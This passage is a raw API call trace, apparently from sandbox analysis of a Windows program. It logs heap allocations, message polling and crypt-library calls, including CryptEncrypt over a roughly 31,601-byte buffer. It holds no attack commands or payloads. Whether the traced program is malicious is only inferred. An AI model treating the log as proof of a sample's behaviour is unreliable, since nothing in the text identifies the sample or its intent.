0x8df0a0 [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.565] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0186.565] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.565] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0186.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0186.566] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0186.566] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0186.567] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.567] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.567] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0186.567] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2728, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2728*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0186.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.568] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0186.568] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0186.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0186.569] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0186.569] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.569] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.569] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.569] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0186.569] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0186.569] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0186.569] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.570] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0186.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.570] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.570] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0186.570] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.570] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0186.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.570] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.570] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0186.570] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.570] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.570] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0186.570] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0186.571] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.571] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.571] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.571] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.571] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0186.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0186.571] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0186.572] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x7b69, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x7b70) returned 1 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0186.572] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.572] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.572] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0186.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.573] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.573] CharLowerBuffW (in: lpsz="byte[31601]", cchLength=0xb | out: lpsz="byte[31601]") returned 0xb [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0186.573] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0186.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0186.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0186.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0186.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0186.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0186.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.575] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.575] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0186.575] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0186.576] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc01280*, pdwDataLen=0x87e820*=0x7b69, dwBufLen=0x7b70 | out: pbData=0xc01280*, pdwDataLen=0x87e820*=0x7b70) returned 1 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0186.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0186.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0186.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0186.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0186.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0186.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0186.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0186.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0186.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.579] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.579] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0186.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.580] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0186.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0186.582] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.582] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0186.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.582] CharUpperBuffW 